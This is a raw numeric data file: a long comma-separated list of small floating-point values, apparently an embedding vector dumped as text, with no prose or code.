0.02433953806757927, -0.013909373432397842, -0.001471758121624589, -0.005424133036285639, -0.031656332314014435, -0.007089077029377222, -0.016216402873396873, -0.036106135696172714, -0.023831842467188835, 0.0332690104842186, 0.0261314045637846, -0.03303009644150734, -0.015260741114616394, 0.01362566091120243, 0.010474960319697857, -0.0004960300866514444, -0.008339650928974152, -0.009579026140272617, 0.01085573248565197, 0.024668047204613686, -0.00521134864538908, -0.006323799956589937, -0.019143121317029, 0.006118481978774071, -0.01452159509062767, 0.035269930958747864, 0.01905352808535099, 0.028132325038313866, -0.01769469492137432, 0.016694234684109688, 0.021786125376820564, 0.022189296782016754, 0.010564553551375866, 0.012617736123502254, 0.06146106496453285, 0.05262118577957153, -0.004184757824987173, 0.0020214507821947336, -0.011684470809996128, 0.0000655035037198104, -0.020337698981165886, 0.01222949754446745, 0.030566278845071793, -0.023667586967349052, -0.013677923940122128, 0.004319148138165474, 0.02737078070640564, 0.03243280574679375, -0.018232254311442375, -0.008033541031181812, -0.008242592215538025, 0.01004939153790474, -0.021815991029143333, -0.019815070554614067, 0.01413335744291544, 0.020203309133648872, -0.00694348756223917, -0.0003824051236733794, -0.00003476409983704798, -0.008481507189571857, 0.01193831954151392, -0.007410119753330946, -0.027759019285440445, 0.0023480933159589767, 0.01517114695161581, 0.0039122444577515125, -0.014865036122500896, -0.039421092718839645, 0.04052607715129852, -0.024175282567739487, 0.044677235186100006, 0.025354929268360138, 0.02592235431075096, -0.018844475969672203, 0.012289226986467838, -0.0022566334810107946, -0.03126809373497963, 0.024085689336061478, -0.021726397797465324, 0.012834252789616585, -0.013767517171800137, 0.009056398645043373, 0.005095623899251223, 0.015798300504684448, -0.002310762880370021, 0.0023536928929388523, 0.029326902702450752, 0.00804100651293993, -0.022846315056085587, -0.0033354873303323984, -0.019247647374868393, 0.04019756615161896, 0.021144039928913116, -0.025534115731716156, 0.007981278002262115, -0.019382037222385406, -0.006196876056492329, 0.0004542664682958275, -0.02947622537612915, -0.026639102026820183, -0.006167011801153421, -0.06414886564016342, 0.01178153045475483, -0.00680536450818181, -0.02038249559700489, 0.014924765564501286, 0.006768033839762211, 0.01130369957536459, -0.013662992045283318, -0.008429245091974735, -0.004871640354394913, 0.0010956524638459086, -0.04103377088904381, 0.012117506004869938, 0.026892948895692825, -0.011408224701881409, 0.01815759390592575, 0.015902826562523842, 0.010937859304249287, 0.011669538915157318, 0.005748908966779709, -0.035180337727069855, -0.023368941619992256, -0.01991959661245346, 0.0034400129225105047, 0.01342407613992691, -0.0449758805334568, 0.043721575289964676, 0.023518264293670654, 0.012095107696950436, 0.011662072502076626, -0.0449758805334568, -0.004905238281935453, 0.011363428086042404, 0.035180337727069855, 0.004468470346182585, -0.008406846784055233, -0.01605214923620224, -0.01729152351617813, 0.019994258880615234, -0.010728808119893074, 0.013730186969041824, 0.0204720888286829, 0.005364404059946537, 0.003613600041717291, -0.012834252789616585, 0.010086722671985626, -0.009877671487629414, 0.004823110997676849, -0.010713876225054264, -0.03742017224431038, -0.002170773223042488, 0.029401563107967377, -0.0046140593476593494, -0.004595394246280193, 0.001355100073851645, 0.03992878645658493, 0.016037216410040855, -0.02965541183948517, 0.0776476040482521, -0.02422007918357849, 0.01809786446392536, -0.025907421484589577, 0.0006906157359480858, -0.007010682951658964, -0.014558926224708557, 0.021890651434659958, 0.012617736123502254, -0.011721801944077015, -0.0009631289285607636, 0.01224442943930626, -0.010325638577342033, 0.0018777281511574984, -0.026400186121463776, 0.009929933585226536, -0.018695153295993805, -0.016276132315397263, -0.03706179931759834, 0.030327362939715385, 0.0064992536790668964, -0.03201470524072647, -0.01876981556415558, -0.019710546359419823, -0.01133356336504221, -0.02728118747472763, 0.026430049911141396, -0.03144728019833565, 0.007981278002262115, -0.002609407529234886, -0.007563175167888403, -0.005379336420446634, -0.0008198728319257498, 0.006129681132733822, -0.010198714211583138, 0.0032216289546340704, -0.0014857570640742779, 0.001503489096648991, 0.0006383528816513717, -0.02035263180732727, 0.024966690689325333, 0.006909890100359917, -0.022502873092889786, 0.007705031428486109, 0.01784401759505272, 0.008011141791939735, -0.0076900990679860115, 0.01084080059081316, 0.021382955834269524, -0.005872100125998259, -0.030103377997875214, 0.0040578339248895645, 0.02084539458155632, -0.01605214923620224, 0.015589249320328236, -0.0075295777060091496, -0.00903400033712387, -0.025369862094521523, 0.031029177829623222, 0.0025086149107664824, 0.008362049236893654, -0.038614749908447266, 0.0005529592162929475, 0.003957041539251804, -0.028430968523025513, -0.01824718713760376, 0.014894900843501091, 0.017858948558568954, -0.02722145803272724, 0.03138755261898041, 0.03377670794725418, -0.013677923940122128, 0.0281472560018301, -0.011408224701881409, -0.026430049911141396, 0.03613600134849548, -0.01059441827237606, 0.013737653382122517, -0.017366185784339905, 0.0026112738996744156, 0.03374684229493141, -0.013984034769237041, -0.017186999320983887, 0.008160464465618134, 0.019411901012063026, -0.004864174406975508, -0.032701585441827774, 0.021099243313074112, -0.029834598302841187, -0.013304618187248707, -0.01833678036928177, 0.04085458442568779, -0.0114903524518013, -0.012490811757743359, -0.029237309470772743, 0.006641109939664602, 0.0030405756551772356, 0.033567655831575394, 0.012856651097536087, 0.009795543737709522, 0.015559385530650616, 0.008160464465618134, -0.001471758121624589, 0.021860787644982338, -0.03840569779276848, -0.0008012075559236109, -0.028595224022865295, -0.018441306427121162, -0.0021539744921028614, 0.0045281993225216866, -0.007988743484020233, -0.02554904855787754, -0.02165173552930355, 0.037748683243989944, 0.013760051690042019, -0.012647599913179874, -0.027325984090566635, -0.020770734176039696, -0.018291983753442764, -0.014842637814581394, -0.018754882737994194, -0.03195497393608093, 0.010661613196134567, -0.03550884500145912, 0.00584596861153841, 0.04623018950223923, 0.0020550484769046307, 0.026639102026820183, 0.0021726395934820175, 0.02789340913295746, 0.010945325717329979, -0.027997933328151703, -0.03724098578095436, -0.027729153633117676, -0.014999426901340485, -0.05375603213906288, 0.010265909135341644, -0.0060960836708545685, 0.03756949305534363, -0.020666208118200302, -0.007507179398089647, -0.028221918269991875, 0.02174132876098156, 0.007667700760066509, -0.02947622537612915, -0.026519643142819405, 0.014275213703513145, -0.010213646106421947, 0.00867562647908926, -0.014424535445868969, 0.005711578764021397, 0.011527682654559612, 0.006745635531842709, 0.001135782920755446, 0.013282219879329205, -0.047185853123664856, 0.01023604441434145, -0.039480820298194885, -0.01778428815305233, 0.0015902826562523842, 0.0035184070002287626, 0.02338387444615364, 0.006555249448865652, -0.012251895852386951, -0.027475306764245033, 0.003848782740533352, -0.02984953112900257, -0.03894326090812683, -0.02792327292263508, -0.026310592889785767, -0.01636572554707527, 0.009579026140272617, -0.007398920599371195, -0.02569837123155594, 0.009198254905641079, -0.023144958540797234, -0.007779692765325308, -0.027997933328151703, 0.027818746864795685, 0.009205720387399197, 0.009579026140272617, -0.026370320469141006, -0.02180105820298195, 0.006637376733124256, 0.03667356073856354, -0.0469469353556633, 0.026698829606175423, -0.02690788172185421, 0.0008212727261707187, 0.017545372247695923, 0.023159891366958618, -0.002993912436068058, 0.025534115731716156, -0.021427752450108528, 0.0211589727550745, 0.01001952774822712, -0.039450954645872116, 0.02000918984413147, -0.006670974660664797, -0.003339220304042101, 0.0016108144773170352, 0.03314955532550812, 0.012617736123502254, 0.0018310649320483208, 0.002027050359174609, 0.028654951602220535, 0.016037216410040855, -0.014902367256581783, -0.0024358201771974564, -0.0174707118421793, -0.028834139928221703, 0.016679301857948303, -0.047365039587020874, -0.014290145598351955, -0.01561911404132843, -0.04575235769152641, -0.03622559458017349, -0.035926949232816696, -0.00804100651293993, -0.030939584597945213, -0.004125028848648071, 0.02257753349840641, 0.012132437899708748, -0.020397428423166275, 0.0029043189715594053, 0.03374684229493141, 0.03317941725254059, -0.006745635531842709, 0.007764760404825211, 0.0036733290180563927, 0.015111418440937996, 0.022159431129693985, -0.016037216410040855, 0.012110039591789246, -0.01882954314351082, -0.029864463955163956, 0.0029285838827490807, 0.016007352620363235, 0.018321847543120384, 0.013073168694972992, -0.011736733838915825, -0.03989892452955246, -0.002544078975915909, 0.01983000338077545, 0.024444062262773514, -0.01645531877875328, 0.004360211547464132, 0.022338617593050003, 0.02156214229762554, 0.009549162350594997, 0.009228118695318699, 0.01003445964306593, 0.018635425716638565, -0.009355043061077595, -0.02895359694957733, 0.019038595259189606, -0.008123134262859821, -0.030640939250588417, -0.002320095431059599, 0.03497128561139107, 0.0015697508351877332, -0.02892373315989971, -0.001284171943552792, 0.016559844836592674, 0.010654146783053875, 0.009579026140272617, -0.008294854313135147, 0.007201068568974733, -0.011624742299318314, 0.002728865249082446, -0.013095567002892494, 0.052561454474925995, -0.012498278170824051, -0.013909373432397842, 0.009101195260882378, 0.008899609558284283, -0.01806800067424774, -0.016276132315397263, -0.015977486968040466, -0.00841431226581335, -0.0033336207270622253, -0.010094188153743744, -0.010064324364066124, -0.013707788661122322, -0.027102001011371613, -0.006286469288170338, 0.02168160118162632, -0.021263496950268745, -0.007260797545313835, -0.009534229524433613, -0.005360671319067478, -0.026698829606175423, -0.020949920639395714, 0.020487021654844284, -0.021412819623947144, 0.013558465987443924, -0.00749224703758955, -0.003615466644987464, 0.00675683468580246, -0.008563634939491749, -0.008175396360456944, -0.0023275616113096476, 0.02595221810042858, -0.02177119441330433, 0.012393752112984657, -0.006215541623532772, -0.018919138237833977, 0.014275213703513145, -0.018635425716638565, -0.017425913363695145, 0.005043361335992813, -0.016231335699558258, 0.001174979959614575, -0.024175282567739487, -0.008324719034135342, 0.013476339168846607, 0.0983138158917427, -0.01368539035320282, -0.005259878467768431, -0.00802607461810112, 0.018291983753442764, 0.01784401759505272, -0.015828166157007217, -0.014655984938144684, 0.016559844836592674, 0.0055473241955041885, 0.017888814210891724, 0.02436940185725689, 0.021039513871073723, 0.012729727663099766, 0.004408741369843483, 0.0014484265120700002, -0.012446015141904354, -0.011400759220123291, 0.02214450016617775, -0.01614174246788025, 0.009810476563870907, 0.018023204058408737, 0.002820325316861272, -0.008839881047606468, 0.04407994821667671, -0.011176775209605694, -0.010161384008824825, -0.01286411751061678, -0.03876407444477081, -0.014715714380145073, 0.0002540812420193106, -0.015589249320328236, -0.0062752701342105865, -0.010303239338099957, 0.008668160066008568, -0.00674190279096365, 0.011363428086042404, -0.017918678000569344, -0.010639214888215065, -0.013446474447846413, 0.005524925887584686, -0.02269699238240719, -0.012057776562869549, 0.02560877799987793, 0.008869745768606663, -0.017127269878983498, 0.031745925545692444, 0.02053181827068329, -0.0054651969112455845, -0.002881920663639903, -0.0007344791665673256, 0.006555249448865652, 0.024906963109970093, 0.015872962772846222, 0.005834769457578659, 0.019187917932868004, -0.015350334346294403, -0.01784401759505272, -0.002771795494481921, -0.02858029119670391, -0.005256145726889372, 0.008630829863250256, -0.013192626647651196, 0.01882954314351082, -0.009041465818881989, -0.009131059981882572, -0.013551000505685806, 0.014820239506661892, -0.022682059556245804, 0.020949920639395714, 0.020890191197395325, 0.011438089422881603, 0.0093251783400774, -0.011019987054169178, 0.008698024787008762, 0.008556168526411057, -0.016470251604914665, 0.022816449403762817, -0.026728695258498192, -0.011139445006847382, 0.028445901349186897, 0.03837583586573601, -0.02118883654475212, 0.023861706256866455, -0.005853434558957815, 0.03243280574679375, -0.020830463618040085, -0.006603779271245003, -0.00612221471965313, -0.0016574776964262128, 0.003003244986757636, -0.02508614957332611, -0.022965772077441216, 0.013812313787639141, 0.01368539035320282, 0.020248105749487877, 0.009250517003238201, -0.0053270733915269375, -0.006010223180055618, -0.005987824872136116, -0.0071413395926356316, 0.0012972375843673944, 0.025354929268360138, -0.017127269878983498, -0.03894326090812683, 0.0034698774106800556, 0.00226223305799067, 0.018665289506316185, -0.0046961866319179535, -0.010818401351571083, -0.019994258880615234, 0.010430163703858852, 0.008264990523457527, -0.009840340353548527, 0.012095107696950436, 0.0038450495339930058, 0.014618654735386372, 0.0005566922482103109, -0.0346427783370018, -0.019277511164546013, -0.010250977240502834, -0.016783827915787697, 0.024936826899647713, -0.010467493906617165, 0.016559844836592674, 0.020128648728132248, 0.009623823687434196, -0.014805307611823082, 0.03756949305534363, 0.038286242634058, -0.007779692765325308, 0.0068240296095609665, -0.0006728837033733726, -0.005842235404998064, 0.03219389170408249, -0.028684817254543304, 0.018426373600959778, -0.004125028848648071, -0.008780152536928654, -0.0074399844743311405, -0.00330935581587255, 0.016291065141558647, 0.03613600134849548, 0.0009066664497368038, 0.006181943695992231, -0.014932231977581978, 0.026833219453692436, 0.018725018948316574, 0.03243280574679375, 0.008003676310181618, -0.009735815227031708, -0.04160119593143463, -0.00411382969468832, 0.03547898307442665, -0.0022883645724505186, 0.011654607020318508, 0.006611245684325695, -0.020277971401810646, -0.002260366454720497, 0.006667241454124451, 0.013842178508639336, -0.024100622162222862, 0.027206525206565857, -0.004479669500142336, 0.0016854756977409124, 0.022771652787923813, 0.004912704229354858, -0.038674481213092804, -0.014215484261512756, -0.02217436395585537, -0.0018515967531129718, 0.0062752701342105865, -0.03825637698173523, 0.00598409166559577, 0.01504422351717949, 0.0020961121190339327, 0.004449804779142141, 0.011684470809996128, 0.041212957352399826, -0.018008271232247353, -0.01691821776330471, 0.01189352199435234, -0.0008632696117274463, -0.01723179593682289, 0.02350333333015442, -0.02433953806757927, 0.018635425716638565, 0.0068986909464001656, -0.029745005071163177, -0.008795084431767464, -0.0034269471652805805, 0.024996556341648102, -0.005532391835004091, -0.018605560064315796, 0.011774064972996712, -0.0056257182732224464, 0.005663048941642046, -0.011811395175755024, -0.00507322559133172, -0.003790920367464423, -0.000891267554834485, 0.00006952819967409596, -0.03449345380067825, 0.0013672324130311608, 0.004729784559458494, -0.026265796273946762, -0.01014645118266344, 0.029715141281485558, -0.0012253762688487768, -0.011482886038720608, -0.008063404820859432, 0.016529981046915054, -0.0070517463609576225, 0.023130027577280998, 0.0014437601203098893, 0.0013952304143458605, 0.0006822163122706115, 0.010907995514571667, -0.02332414500415325, -0.0026915348134934902, -0.022398347035050392, -0.006495520938187838, 0.003217895980924368, 0.0009383974247612059, -0.005939295049756765, 0.02471284382045269, 0.0326717235147953, -0.024324605241417885, -0.007495980244129896, 0.006670974660664797, -0.03921204060316086, -0.004009304102510214, 0.0029472492169588804, 0.010333104059100151, -0.017888814210891724, 0.0053830696269869804, 0.00015328869631048292, 0.005763841327279806, 0.014252815395593643, -0.0007148805889301002, -0.00023961564875207841, -0.010086722671985626, -0.010071789845824242, 0.00009886770567391068, 0.01744084618985653, -0.000233432772802189, 0.017620032653212547, -0.02121870033442974, -0.008966805413365364, 0.015320469625294209, 0.02387663908302784, -0.012042844668030739, -0.006685906555503607, 0.008578566834330559, 0.002962181344628334, 0.028027798980474472, 0.006865093484520912, -0.0114903524518013, 0.013797381892800331, -0.001777868834324181, -0.0020307835657149553, -0.012781990692019463, 0.0008735355222597718, 0.002648604568094015, -0.006476855371147394, 0.029759937897324562, -0.03153687343001366, 0.004166092723608017, 0.016739031299948692, -0.0061782109551131725, 0.007712497841566801, -0.0025104815140366554, -0.001899193157441914, -0.00617074454203248, -0.012625201605260372, 0.010504825040698051, 0.02029290236532688, -0.010064324364066124, 0.0007494113524444401, 0.00533453980460763, -0.008705491200089455, 0.03750976547598839, 0.024294741451740265, -0.025997014716267586, -0.006215541623532772, -0.02329428121447563, -0.016739031299948692, 0.008824949152767658, -0.02205490693449974, -0.009780611842870712, 0.0015240209177136421, -0.0016602774849161506, -0.0019617220386862755, -0.01296117715537548, 0.01741098240017891, 0.007320526521652937, -0.006320067215710878, 0.00893694069236517, 0.0031730991322547197, -0.00033574190456420183, 0.023174824193120003, 0.022338617593050003, 0.006320067215710878, -0.002127842977643013, -0.020979786291718483, -0.0389731228351593, -0.008033541031181812, 0.0012907048221677542, 0.006260338239371777, -0.019411901012063026, 0.014484264887869358, -0.007100276183336973, -0.006055019795894623, -0.046439241617918015, 0.0053270733915269375, -0.004278084263205528, -0.013648059219121933, -0.01405869610607624, -0.015514588914811611, 0.04608086496591568, 0.022368483245372772, -0.01853089965879917, -0.022622330114245415, -0.011355961672961712, -0.0007900084019638598, -0.0023704918567091227, 0.014700781553983688, -0.0008427378488704562, -0.010654146783053875, -0.030670803040266037, 0.005386802367866039, 0.026773491874337196, 0.012371353805065155, -0.0010069924173876643, 0.015163681469857693, -0.011736733838915825, 0.00008230226376326755, 0.017664829269051552, -0.023025501519441605, 0.003311222419142723, -0.03195497393608093, 0.012296692468225956, -0.00653285114094615, 0.01882954314351082, 0.03043188713490963, -0.010094188153743744, -0.017022743821144104, 0.0035986679140478373, 0.0041399612091481686, 0.0011012520408257842, -0.009683552198112011, 0.012684931047260761, -0.0018870608182623982, 0.017858948558568954, 0.00507322559133172, 0.016216402873396873, 0.008309787139296532, -0.013707788661122322, 0.0027568633668124676, -0.012012979947030544, -0.009228118695318699, -0.0069621531292796135, -0.007025614846497774, 0.005801171995699406, 0.006387262139469385, -0.009616357274353504, -0.02242821268737316, 0.006204342003911734, -0.0018366645090281963, -0.01087066438049078, 0.006312600802630186, -0.016201471909880638, 0.02566850557923317, 0.02130829356610775, -0.0023070296738296747, -0.004240753594785929, 0.021263496950268745, -0.010766139253973961, -0.00867562647908926, 0.03219389170408249, -0.0007330792723223567, -0.0132374232634902, -0.00574517622590065, 0.01735125295817852, -0.0020326499361544847, 0.009220653213560581, -0.00415116036310792, 0.018426373600959778, -0.006204342003911734, -0.008742821402847767, 0.008376982063055038, 0.007891684770584106, -0.007331725675612688, 0.04243740066885948, 0.011662072502076626, -0.005050827283412218, 0.016156675294041634, 0.012147370725870132, -0.010997588746249676, 0.009676085785031319, 0.0009537963196635246, -0.014222950674593449, -0.00303497607819736, 0.0189937986433506, -0.000908532936591655, -0.0014474932104349136, -0.01856076344847679, -0.014491730369627476, 0.014342408627271652, -0.025683438405394554, 0.010616816580295563, -0.0055622560903429985, -0.011109580285847187, -0.011184241622686386, -0.013416609726846218, -0.02174132876098156, -0.010355502367019653, 0.0073653231374919415, -0.028625087812542915, -0.019367104396224022, 0.026579372584819794, 0.011788996867835522, -0.02347346767783165, -0.008421778678894043, 0.0002848789736162871, -0.007634103298187256, -0.007242132443934679, -0.024384334683418274, 0.012931312434375286, -0.021606938913464546, -0.0001957522181328386, 0.015260741114616394, -0.0008413378964178264, -0.01772455871105194, 0.015193545259535313, -0.011632208712399006, -0.013244889676570892, -0.004998564720153809, -0.01896393485367298, 0.008839881047606468, 0.014342408627271652, -0.022846315056085587, -0.007436251267790794, 0.004871640354394913, -0.007779692765325308, -0.0028576557524502277, -0.008130599744617939, -0.01023604441434145, -0.013692856766283512, -0.005177751183509827, 0.008190329186618328, -0.003915977664291859, 0.006973352283239365, 0.0134091442450881, -0.007018148899078369, -0.004632724914699793, 0.013095567002892494, 0.0226372629404068, -0.013491271063685417, -0.010265909135341644, 0.031775787472724915, -0.009997129440307617, 0.015947623178362846, 0.003217895980924368, 0.0149844940751791, 0.0009393306681886315, -0.011109580285847187, -0.013207558542490005, -0.0016444120556116104, -0.013662992045283318, 0.025444522500038147, 0.01750057563185692, 0.014364806935191154, -0.015305537730455399, 0.007869286462664604, -0.023891570046544075, -0.005498794373124838, -0.03380657359957695, 0.018545832484960556, -0.005252412520349026, 0.010833334177732468, 0.017396049574017525, 0.017172066494822502, -0.015828166157007217, 0.0005398935172706842, 0.0021427753381431103, 0.0069061568938195705, 0.01495463028550148, 0.015514588914811611, -0.0012599070323631167, 0.020681140944361687, -0.0005576255498453975, -0.01241615042090416, 0.007454916834831238, 0.022786585614085197, 0.008645761758089066, 0.016500115394592285, 0.01152021624147892, -0.0014913566410541534, -0.022219160571694374, -0.012752125971019268, -0.027908340096473694, 0.00804100651293993, -0.010318172164261341, -0.0007601439137943089, -0.019591087475419044, 0.0012263095704838634, 0.003817051649093628, 0.0013177694054320455, -0.025220539420843124, 0.001410162658430636, 0.0076900990679860115, -0.00875028781592846, -0.010056857950985432, -0.007507179398089647, 0.01633586175739765, 0.006308868061751127, 0.0032757583539932966, -0.010691477917134762, -0.003708793083205819, -0.001828265143558383, -0.00051422871183604, 0.0026840686332434416, -0.030820125713944435, -0.02177119441330433, 0.002730731852352619, 0.018471170216798782, -0.006838961970061064, -0.015843097120523453, -0.015529520809650421, 0.006223007570952177, -0.0043639447540044785, -0.017396049574017525, -0.003434413345530629, 0.0007288795313797891, 0.0013103033415973186, 0.01388697512447834, -0.012625201605260372, -0.006260338239371777, 0.003889846382662654, 0.0003310755710117519, 0.009422237984836102, 0.00893694069236517, 0.02566850557923317, 0.0025702102575451136, -0.01495463028550148, 0.0022585000842809677, -0.009369974955916405, -0.028445901349186897, -0.021845854818820953, 0.019277511164546013, 0.018023204058408737, -0.010056857950985432, -0.019322307780385017, 0.012199632823467255, 0.004274351522326469, -0.0009920601733028889, 0.006760567892342806, 0.00443860562518239, -0.0005818904028274119, 0.001400829991325736, -0.019307374954223633, 0.010176315903663635, 0.005677980836480856, 0.00255527812987566, 0.018112797290086746, 0.0031283025164157152, 0.0075930398888885975, -0.0007610771572217345, -0.020920056849718094, -0.009997129440307617, -0.0012169769033789635, -0.006021422334015369, 0.006641109939664602, -0.020487021654844284, 0.019158052280545235, 0.009608890861272812, -0.02659430354833603, 0.007966345176100731, -0.00674190279096365, 0.0069621531292796135, -0.004860441200435162, -0.03225361928343773, -0.011012520641088486, -0.02641511708498001, 0.007951413281261921, 0.017097406089305878, -0.0064133936539292336, -0.026863085106015205, 0.00045799952931702137, 0.0032832245342433453, 0.026340456679463387, -0.02517574280500412, -0.00675683468580246, -0.010721342638134956, -0.01679876074194908, -0.0264748465269804, -0.01361072901636362, -0.02078566700220108, 0.003460544627159834, -0.006659775506705046, 0.006697105709463358, -0.003076039720326662, -0.011774064972996712, -0.01252814196050167, 0.022368483245372772, 0.02399609610438347, -0.007096542976796627, -0.0038637148682028055, -0.01560418214648962, -0.009855273179709911, 0.0017424047691747546, -0.0046625891700387, 0.0011171175865456462, -0.016559844836592674, -0.008018608205020428, 0.0020121182315051556, -0.011998048052191734, 0.006364863831549883, -0.03625545650720596, 0.016500115394592285, 0.0005590254440903664, -0.00002992279223690275, 0.007742362096905708, -0.01287904940545559, -0.00004360095044830814, 0.011624742299318314, -0.022965772077441216, -0.004498334601521492, 0.0014064295683056116, 0.0010797870345413685, 0.03353779390454292, 0.014305077493190765, -0.004819377791136503, -0.009101195260882378, 0.020143579691648483, -0.012669998221099377, -0.0036602632608264685, -0.0006742835976183414, -0.009452102705836296, 0.0040578339248895645, -0.022816449403762817, 0.005032162182033062, 0.012998507358133793, -0.024906963109970093, -0.010348036885261536, 0.013334482908248901, 0.004240753594785929, 0.008369515649974346, 0.007425052113831043, -0.0026523375418037176, 0.02820698544383049, 0.0026336724404245615, 0.013140363618731499, 0.0057003796100616455, 0.001261773519217968, -0.009474501013755798, -0.015977486968040466, -0.0057078455574810505, 0.03201470524072647, 0.013879509642720222, 0.017097406089305878, -0.005263611674308777, -0.0028539227787405252, 0.005831036251038313, 0.012050311081111431, -0.022876178845763206, 0.018859408795833588, 0.011475419625639915, -0.0008656028076075017, -0.0173213891685009, 0.02981966733932495, -0.007914083078503609, -0.0031898978631943464, -0.02205490693449974, 0.01370032224804163, -0.02050195448100567, -0.008533770218491554, -0.011983116157352924, 0.0038413165602833033, 0.014760510995984077, -0.007227200083434582, -0.0069770850241184235, -0.0093998396769166, -0.010094188153743744, -0.027146797627210617, -0.00507322559133172, -0.01917298510670662, -0.002557144733145833, -0.0008511372143402696, 0.029431428760290146, -0.00596915977075696, 0.023085229098796844, 0.005670514889061451, 0.013170228339731693, -0.043064557015895844, -0.01611187867820263, 0.011236504651606083, -0.02174132876098156, 0.008332185447216034, -0.012893982231616974, -0.01688835397362709, -0.007951413281261921, -0.01023604441434145, -0.0011115180095657706, 0.010706409811973572, 0.008989203721284866, 0.02121870033442974, -0.016261199489235878, -0.00437514390796423, 0.018605560064315796, -0.015096486546099186, 0.007981278002262115, 0.02789340913295746, 0.017201930284500122, 0.00802607461810112, 0.015410062856972218, -0.01824718713760376, 0.010616816580295563, -0.0025702102575451136, -0.00006597013270948082, 0.021860787644982338, -0.0009659287170507014, -0.025429589673876762, -0.0034680108074098825, 0.0013280353741720319, -0.011206639930605888, -0.005345738958567381, -0.027057204395532608, -0.0027661959175020456, 0.007596772629767656, 0.015036757104098797, 0.028774410486221313, 0.011154376901686192, -0.00002452735679980833, 0.014140822924673557, -0.012669998221099377, -0.01633586175739765, -0.018038135021924973, -0.014424535445868969, 0.03401562198996544, 0.005875833332538605, 0.0071413395926356316, 0.008205261081457138, -0.0004607993469107896, 0.001200178056024015, 0.003693860722705722, 0.007611704990267754, -0.021726397797465324, 0.010512291453778744, -0.016724098473787308, -0.003540805308148265, -0.021666668355464935, 0.009243051521480083, 0.01252814196050167, -0.012251895852386951, 0.004087698180228472, -0.0011628475040197372, 0.009041465818881989, -0.020173445343971252, 0.007242132443934679, -0.00838444847613573, 0.017396049574017525, 0.015163681469857693, 0.0025179474614560604, 0.008608431555330753, 0.009982196614146233, -0.017993338406085968, -0.009257983416318893, -0.012692396529018879, -0.01706754043698311, 0.0076751671731472015, 0.01573857292532921, -0.030611075460910797, -0.009638755582273006, 0.021920515224337578, 0.012901447713375092, -0.041093502193689346, -0.005200149491429329, -0.02987939491868019, 0.011184241622686386, -0.008698024787008762, -0.011557547375559807, 0.005898231640458107, 0.046469103544950485, 0.008264990523457527, -0.011759132146835327, -0.003348552854731679, 0.02526533603668213, -0.014088560827076435, -0.006753101944923401, -0.007891684770584106, -0.01297610905021429, -0.0004684987652581185, -0.002495549153536558, 0.0017041409155353904, -0.013147830031812191, 0.011475419625639915, 0.004811911843717098, -0.01258787140250206, -0.0004218355461489409, -0.04148174077272415, -0.010751206427812576, 0.011079715564846992, 0.026176201179623604, 0.01277452427893877, 0.002939783036708832, -0.01611187867820263, 0.004845509305596352, 0.008190329186618328, -0.014230417087674141, -0.00017615366959944367, 0.004289283417165279, 0.00929531455039978, -0.0039757066406309605, -0.007499713450670242, -0.00698081823065877, 0.013894441537559032, 0.031029177829623222, 0.011930853128433228, 0.0056219850666821, 0.001460558851249516, -0.0015669510466977954, -0.01784401759505272, -0.012005514465272427, 0.005155352875590324, 0.008354583755135536, -0.017739491537213326, 0.0032141627743840218, -0.018456237390637398, -0.009145991876721382, -0.01060935016721487, -0.010975190438330173, -0.01876981556415558, -0.009691018611192703, -0.011124512180685997, -0.00866069458425045, -0.02072593756020069, -0.026026880368590355, 0.0015594849828630686, -0.0019393236143514514, 0.019292443990707397, 0.010004594922065735, 0.019844936206936836, 0.011281301267445087, -0.020233172923326492, -0.0041212961077690125, -0.017022743821144104, -0.0015081553719937801, -0.009019067510962486, 0.0017788021359592676, -0.00904893223196268, -0.008048472926020622, 0.008264990523457527, 0.017276592552661896, 0.00692855566740036, 0.0026523375418037176, -0.00906386412680149, -0.03377670794725418, 0.0034848095383495092, 0.008444176986813545, 0.006506720092147589, 0.01020618062466383, -0.014252815395593643, 0.007705031428486109, -0.02699747495353222, -0.01726165972650051, 0.005054560489952564, -0.01023604441434145, -0.0004922969965264201, 0.007742362096905708, -0.010616816580295563, -0.0006392861832864583, 0.017769355326890945, 0.004875373560935259, -0.0008128733607009053, 0.006353664677590132, -0.019038595259189606, -0.010183782316744328, 0.01186365820467472, 0.013461406342685223, 0.010952792130410671, -0.0031693661585450172, -0.002527280244976282, -0.0016350793885067105, -0.008309787139296532, 0.02211463451385498, 0.010362968780100346, -0.015089020133018494, -0.015201011672616005, -0.01187859009951353, -0.009101195260882378, -0.005726510658860207, 0.02548931911587715, 0.030013784766197205, -0.0007330792723223567, -0.02601194754242897, -0.00680536450818181, 0.006361130625009537, 0.015902826562523842, 0.01576843671500683, -0.010489893145859241, 0.004472203552722931, 0.0243096724152565, 0.002950982190668583, 0.012192167341709137, -0.0020251839887350798, 0.0026336724404245615, -0.017664829269051552, 0.0035258731804788113, 0.014208018779754639, -0.007193602621555328, -0.019665749743580818, 0.0022249023895710707, 0.015051688998937607, 0.004154893569648266, -0.021756261587142944, -0.005207615904510021, -0.0134838055819273, -0.0038263844326138496, 0.014738112688064575, 0.018082931637763977, -0.00831725262105465, 0.000054245996579993516, 0.024040892720222473, 0.0037423905450850725, 0.005670514889061451, -0.004382609855383635, -0.002939783036708832, -0.01325235515832901, -0.011079715564846992, -0.005162819288671017, 0.015380198135972023, 0.01370032224804163, -0.028595224022865295, 0.011400759220123291, -0.004576729144901037, -0.025832761079072952, 0.001553885405883193, -0.0057974387891590595, -0.017172066494822502, -0.0111469104886055, 0.002803526585921645, -0.031029177829623222, -0.005450264550745487, -0.015365266241133213, 0.014245348982512951, -0.0005375603213906288, 0.011467954143881798, -0.0069061568938195705, 0.030730532482266426, 0.010094188153743744, -0.015021825209259987, -0.006066218949854374, -0.038674481213092804, -0.02168160118162632, -0.014432001858949661, -0.019277511164546013, 0.029640479013323784, -0.030133243650197983, -0.006865093484520912, 0.0017452045576646924, 0.010527223348617554, 0.012304158881306648, 0.005737709812819958, -0.015410062856972218, -0.011900988407433033, -0.011609810404479504, -0.0007956079789437354, -0.005786239635199308, -0.012767057865858078, -0.021636802703142166, 0.00848897360265255, -0.0021110442467033863, -0.020024122670292854, 0.003107770811766386, -0.006200609263032675, -0.010101654566824436, -0.019904663786292076, -0.007727429736405611, -0.007137606851756573, 0.000842271198052913, -0.013207558542490005, -0.025997014716267586, 0.0013149696169421077, -0.021054446697235107, -0.002260366454720497, 0.02471284382045269, 0.00539800152182579, -0.019665749743580818, 0.0022361017763614655, -0.02569837123155594, 0.01685849018394947, -0.00021815056970808655, 0.00876521971076727, 0.004714852198958397, 0.0010200580582022667, 0.008115667849779129, -0.0023275616113096476, -0.015693776309490204, -0.010661613196134567, -0.011512750759720802, 